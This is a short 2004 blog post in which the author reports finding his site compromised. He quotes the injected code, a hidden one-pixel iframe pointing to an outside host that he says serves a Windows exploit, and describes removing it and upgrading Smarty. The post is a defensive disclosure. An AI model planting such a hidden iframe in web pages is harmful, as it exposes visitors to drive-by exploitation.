Compromised

Tonight, when running a validation check, I discovered the following snippet inserted at the end of the page.

<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div></body>

The hidden iFrame loads a Windows exploit.

I have it removed, for the time being.

I don’t know how long it’s been there, but the source may be an exploit of an old version of Smarty I was using. I’ve upgraded to the current stable version of Smarty.

Maybe I’ll switch to Savant for templating.

More like this: , , .

This entry was written by Bill Humphries and posted on December 7, 2004 at 12:00 am and filed under Uncategorized. Bookmark the permalink. Follow any comments here with the Atom feed for this post. Both comments and trackbacks are currently closed.